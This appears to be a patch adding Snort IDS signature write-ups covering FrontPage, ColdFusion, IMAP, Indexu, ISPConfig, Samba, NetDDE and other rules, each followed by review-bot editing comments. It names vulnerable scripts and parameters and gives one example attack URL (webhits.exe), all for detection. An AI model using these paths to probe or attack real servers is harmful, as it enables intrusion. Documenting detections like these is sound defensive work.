+Affected Systems:
+	All systems running Microsoft FrontPage Server Extensions
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
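Review bot: this file is word-for-word identical to 959.txt apart from the Sid line, so the same objection applies: nothing in the text identifies what the rule for SID 962 actually matches. Each FrontPage entry should name the specific request or component its rule detects and carry its own references rather than an empty Additional References section.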
--- /dev/null
+++ b/doc/signatures/915.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+915
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a ColdFusion web server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Coldfusion. Many known vulnerabilities exist for this platform and 
+the attack scenarios are legion.
+
+--
+Affected Systems:
+	All systems running ColdFusion
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
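Review bot: the Summary says "a known vulnerability in a ColdFusion web server" but nothing in the file says which one or what request the rule matches; "a host running Coldfusion" in Detailed Information also spells the product differently from "ColdFusion" in the Summary and Affected Systems. Name the component or path the rule looks for, use one spelling, and fill in the empty Additional References section.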
--- /dev/null
+++ b/doc/signatures/2330.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2330
+
+--
+Summary:
+This event is generated when a remote user sends an overly long string 
+to an IMAP server via the command AUTH. This may indicate an attempt to 
+exploit a buffer overflow condition.
+
+--
+Impact:
+Serious. Possible remote execution of arbitrary code, which may lead to
+a remote root compromise.
+
+--
+Detailed Information:
+When a large amount of data is sent to a vulnerable IMAP server in the 
+AUTHENTICATE command, a buffer overflow condition may occur. This can 
+allow the attacker to execute arbitrary code, which may allow the 
+attacker to gain root access to the compromised server.
+
+--
+Affected Systems:
+	IMAP servers
+
+--
+Attack Scenarios:
+An attacker can send a sufficiently long AUTHENTICATE command to the 
+IMAP server, creating a buffer overflow condition. This can then allow 
+the attacker to execute code of their choosing and possibly gain root 
+access to the compromised server.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate patches for your operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
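Review bot: the Summary calls the command "AUTH" while Detailed Information and Attack Scenarios call it "AUTHENTICATE"; use the one the rule actually matches throughout. "Affected Systems: IMAP servers" should name the implementations and versions the overflow applies to, and Additional References is empty although Ease of Attack states "Exploits exist". Corrective Action says "Apply the appropriate patches for your operating system", which presumes the IMAP server ships with the OS; "patches for your IMAP server" is the accurate advice.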
--- /dev/null
+++ b/doc/signatures/940.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+940
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft FrontPage Server Extensions
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
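Review bot: third copy of the 959.txt text with only the Sid changed; the remarks on that file apply here too. At minimum the Summary should state the request this specific rule matches so the three FrontPage entries are distinguishable, and Additional References should not be empty.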
--- /dev/null
+++ b/doc/signatures/612.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+612
+
+--
+Summary:
+This event is generated when a request is made via Remote Procedure Call (RPC) to list the logged in users. 
+
+--
+Impact:
+Reconnaissance.  A response to this request provides valid user names that can connect to the host.  
+
+--
+Detailed Information:
+The rusers RPC query is used to discover the users currently logged on to the host.  A response to this request provides valid user names that can connect to the host.  This information can be used to attempt a brute force guessing of associated passwords.
+
+--
+Affected Systems:
+All systems running rusers.
+
+--
+Attack Scenarios:
+An attacker may attempt to list all logged in users to gather information for a future brute force password attack.
+
+--
+Ease of Attack:
+Simple.   
+
+--
+False Positives:
+If a legitimate remote user is allowed to list users, this will generate a false positive.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0626
+
+--
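Review bot: the Additional References link "www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0626" lacks the "http://" scheme the other files use and uses the "www." host rather than the "http://cve.mitre.org/cgi-bin/cvename.cgi?name=..." form found elsewhere in this patch; make it consistent. "Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines" is hard to act on without saying which ports are meant; name them, as the RPC DCOM entry (3392.txt) does.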
--- /dev/null
+++ b/doc/signatures/100000624.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000624
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "message_create.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"message_create.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
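Review bot: the "Sid:", "Affected Systems:" and "Contributors:" sections run straight into the next "--" separator with no blank line, unlike the other files in this patch; add the blank lines so the layout is uniform. The Attack Scenarios paragraph (an attacker who can "access an authentication mechanism and supply his/her own credentials") is generic CGI boilerplate and does not describe a remote file include; the scenario here is a URL pointing at the attacker's host passed in "admin_template_path" to "message_create.php", which the Summary already states. "may indicate that an exploitation attempt has been attempted" should be "may indicate an exploitation attempt", and "ona web server" should be "on a web server".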
--- /dev/null
+++ b/doc/signatures/682.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid: 
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an SQL database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained administrator access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an SQL database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+--
+
+Attack Scenarios: 
+Simple. These are SQL database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Disallow direct access to the SQL server from sources external to the protected network.
+
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
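Review bot: the Sid section is empty; the file is named 682.txt, so the Sid line should read 682, and without it the document cannot be matched to its rule. The file also lacks the "Affected Systems" section every other entry carries. In Detailed Information, "This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit" is left over from a telnet rule description and makes no sense for SQL commands; drop it or rewrite it for a database session. Attack Scenarios reads "Simple. These are SQL database commands.", which is an Ease of Attack answer; describe the scenario (an attacker who has reached the SQL server issuing the command) instead. Several "--" separators here are followed by a blank line before the next heading, unlike the other files.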
--- /dev/null
+++ b/doc/signatures/100000489.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000489
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "ISPConfig" application running on a webserver. 
+Access to the file "login.php" using a remote file being passed as the 
+"go_info[isp][classes_root]" parameter may indicate that an exploitation 
+attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "go_info[isp][classes_root]" parameter in the 
+"login.php" script used by the "ISPConfig" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using ISPConfig
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
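Review bot: same template problems as the Indexu entries in this patch: no blank line before the "--" after the Sid, Affected Systems and Contributors sections, an Attack Scenarios paragraph about supplying credentials to "an authentication mechanism" that does not describe remote file inclusion via "go_info[isp][classes_root]" in "login.php", "ona web server" for "on a web server", and "an exploitation attempt has been attempted". The Affected Systems line "All systems running CGI applications using ISPConfig" should name the ISPConfig versions affected.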
--- /dev/null
+++ b/doc/signatures/1607.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+1607
+
+--
+Summary:
+This event is generated when an attempt is made to access hsx.cgi on a 
+web server. This may indicate an attempt to exploit a vulnerability in 
+the Hyperseek 2000 search engine that allows read-access to directory 
+listings and files.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event may indicate that an attempt has been made to exploit a 
+directory traversal vulnerability in HyperSeek 2000. An attacker can use
+directory traversal techniques to view hidden files and directories on 
+the web server.
+
+--
+Affected Systems:
+Web servers running iWeb Systems HyperSeek 2000 are vulnerable. 
+
+--
+Attack Scenarios:
+An attacker can use directory traversal techniques when executing 
+hsx.cgi to view directories and files on the web server.
+
+--
+Ease of Attack:
+Simple. Exploits exist. 
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Uprade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/2314
+
+CERT/CC
+http://www.kb.cert.org/vuls/id/146704
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0253
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=10602
+
+--
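Review bot: "Uprade to the latest non-affected version" should be "Upgrade"; the product is spelled "Hyperseek 2000" in the Summary and "HyperSeek 2000" in Detailed Information and Affected Systems, so use one form. Otherwise this entry is the model the rest of the patch should follow: it names the script ("hsx.cgi"), the vulnerability class and the vendor, and its Additional References carry Bugtraq, CERT/CC, CVE and Nessus links.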
--- /dev/null
+++ b/doc/signatures/100000635.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000635
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "template_delete.php" using a remote file being passed as 
+the "admin_template_path" parameter may indicate that an exploitation attempt 
+has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"template_delete.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
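Review bot: same issues as 100000624.txt: missing blank lines before the "--" after the Sid, Affected Systems and Contributors sections, "ona web server", "an exploitation attempt has been attempted", and an Attack Scenarios paragraph about credentials that does not describe the remote file include through "admin_template_path" in "template_delete.php". Since the Indexu entries differ only in the script name, one wording fix should be applied to all of them together.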
--- /dev/null
+++ b/doc/signatures/1781.txt
@@ -0,0 +1,65 @@
+Rule:  
+
+--
+Sid:
+
+1781
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "dildo".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "dildo".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website. etc.etc.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
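Review bot: the Summary "a webpage was visited the included the content "dildo"" is missing "that" ("a webpage was visited that included the content"). The Sid value sits after a blank line unlike the other files, and Additional References is followed by six blank lines before the closing "--"; tidy both. "Affected Systems: All" says nothing for a content rule; something like "Any web client whose traffic is inspected" states what is meant. "Steven Alexander<alexander.s@mccd.edu>" needs a space before the address.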
--- /dev/null
+++ b/doc/signatures/431.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+
+Sid:
+431
+
+--
+
+Summary:
+This event is generated when a host generates and ICMP Type 40 Code 2 Decompression Failed datagram.
+
+--
+
+Impact:
+ICMP Type 40 Code 2 datagrams are an indication that a received datagram failed a decompression check for a given SPI.  Normally this is an indication that hosts using IP Security Protocols such as AH or ESP have been configured incorrectly or are failing to establish a session with another host.
+
+--
+
+Detailed Information:
+Hosts using IP Security Protocols such as AH or ESP generate ICMP Type 40 datagrams when a failure condition occurs.  ICMP Type 40 Code 2 datagrams are generated when a received datagram fails the decompression check for a given SPI (Security Parameters Index). 
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+
+--
+
+Corrective Action:
+ICMP Type 40 datagrams not normally seen on the network.  Currently Sourcefire is unaware of any hardware that has implemented these types of ICMP datagrams.  Hosts generating these types of ICMP datagrams should be investigated for nefarious activity or configuration errors. 
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+RFC2521
+
+
+--
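Review bot: "a host generates and ICMP Type 40 Code 2" should be "an ICMP", and "ICMP Type 40 datagrams not normally seen on the network" is missing "are". The file has no "Affected Systems" section, which every other entry in the patch carries; "Hosts using IP Security Protocols such as AH or ESP" from Detailed Information belongs there. Attack Scenarios says "None known" while Ease of Attack says "Numerous tools and scripts can generate this type of ICMP datagram" and Corrective Action asks for hosts to be "investigated for nefarious activity"; the three should agree on whether crafted Type 40 messages are a concern. The reference "RFC2521" should carry a URL like the other files' references.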
--- /dev/null
+++ b/doc/signatures/805.txt
@@ -0,0 +1,80 @@
+Rule:
+
+--
+Sid:
+805
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in the WebSpeed WSIS Messenger 
+Administration Utility. 
+
+--
+Impact:
+Information gathering and system integrity. Unauthorized administrative 
+access to the to the WebSpeed configuration utility can allow an 
+attacker to view and change WebSpeed configuration, and possibly stop 
+WebSpeed services.
+
+--
+Detailed Information:
+The WSIS Messenger Administration Utility is a web-based administration 
+utility provided with the Progress WebSpeed 3.0 development environment 
+and transaction server. It allows WebSpeed administrators to remotely 
+manage the WebSpeed system. The configuration utility has a 
+vulnerability that allows unauthenticated users to configure services 
+when the WSMAdmin function is invoked using wsisa.dll.
+
+--
+Affected Systems:
+Any system running Progress WebSpeed 3.0 WSIS Messenger Administration 
+Utility.
+
+--
+Attack Scenarios:
+An attacker can access the WSIS Messenger Administration Utility, which 
+can then be used to view and change WebSpeed configuration. The attacker
+can potentially stop WebSpeed services. 
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+If a legitimate remote user accesses the web-based administration 
+utility, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disable the WSIS Messenger Administration Utility.
+
+Install the appropriate patch. Patches can be found at
+http://www.progress.com/patches/patchlst/availpatche.html.
+
+Disallow access to the WSIS Messenger Administration Utilility from 
+sources external to the protected network.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/969
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0127
+
+--
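Review bot: "access to the to the WebSpeed configuration utility" duplicates "to the", and "Utilility" in Corrective Action should be "Utility". The Impact line "Information gathering and system integrity." is cut short compared with the "system integrity compromise" phrasing used in the other entries. The patch URL under Corrective Action ends in "availpatche.html", which looks truncated; verify the link before this ships.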
--- /dev/null
+++ b/doc/signatures/3026.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3026
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
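Review bot: "heterogenous" should be "heterogeneous", and "remote server.The problem" is missing a space after the period. Detailed Information attributes the bug to an integer overflow in memory allocation, while Attack Scenarios describes overflowing "a buffer containing the information for the access control lists"; make clear these are one issue (an undersized allocation for the ACL data) so the reader does not take them for two vulnerabilities. Additional References is empty; add the Samba advisory and CVE entry that support "Samba 3.0.8 and prior".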
--- /dev/null
+++ b/doc/signatures/2288.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2288
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application Proxy2.de Advanced Poll 2.0.2
+running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application Proxy2.de Advanced Poll
+2.0.2. This application does not perform stringent checks when handling
+user input, this may lead to the attacker being able to execute PHP
+code, include php files and possibly retrieve sensitive files from the
+server running the application.
+
+--
+Affected Systems:
+	All systems running Proxy2.de Advanced Poll 2.0.2
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
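Review bot: Attack Scenarios ("An attacker can access an authentication mechanism and supply his/her own credentials") is the generic CGI boilerplate and does not match Detailed Information, which says the flaw lets the attacker "execute PHP code, include php files and possibly retrieve sensitive files"; the scenario should describe supplying crafted input to the affected script. "user input, this may lead to" is a comma splice; start a new sentence at "This may lead". Additional References is empty.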
--- /dev/null
+++ b/doc/signatures/1073.txt
@@ -0,0 +1,69 @@
+Rule:  
+
+Sid:
+1073
+
+--
+
+Summary:
+This event is generated when an attempt is made to read web application
+source code.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+The webhits.exe sample program that comes with Microsoft Index Server in IIS
+contains a vulnerability that allows the reading of web application source
+code.
+
+Sometimes web application source code contains highly sensitive information,
+such as database passwords and information concerning backend setups.  This
+could be a prelude to further attacks.
+
+--
+Affected Systems:
+	Microsoft Index Server when deployed in conjunction with Microsoft IIS.
+
+--
+Attack Scenarios:
+Attacker sends a simple URL like the following and then chooses which
+file they want to view:
+http://servername/scripts/samples/search/webhits.exe
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Remove the samples directory from the webserver.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+
+--
+Additional References:
+
+http://www.win2000mag.com/Articles/Index.cfm?ArticleID=475&pg=2
+
+http://secinf.net/info/www/cgi-bugs.htm
+
+--
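Review bot: the file opens with "Rule:" followed directly by "Sid:" with no "--" separator between them, unlike every other entry; add the separator. "Original document author unkown" should be "unknown". The Attack Scenarios URL and "webhits.exe sample program" are the kind of specifics the other entries lack, but Additional References holds only two secondary links; add the CVE entry or the vendor bulletin for this issue so the reference does not depend on those sites.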
--- /dev/null
+++ b/doc/signatures/2937.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2937
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
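Review bot: the Impact and Corrective Action lines lack their terminating periods ("Execution of arbitrary code with system level privileges", "Apply the appropriate vendor supplied patches"), unlike the rest of the document. Detailed Information also states the service "is not started by default", yet Ease of Attack is an unqualified "Simple."; noting that remote exploitation requires NetDDE to be enabled (or a local foothold, as the second paragraph describes) would make the rating consistent with the text.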
--- /dev/null
+++ b/doc/signatures/2171.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+2171
+
+
+--
+Summary:
+This event is generated when a possible outgoing virus is detected. 
+
+--
+Impact:
+Informational event. An virus on an infected host may be attempting to 
+propogate.
+
+--
+Detailed Information:
+This event indicates that an outgoing email message possibly containing 
+a virus has been detected.
+
+This rule generates an event when a filename extension commonly used by 
+viruses is detected.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+This is indicative of a virus infection.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A legitimate attachment to an email may generate this event.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of virus infection.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
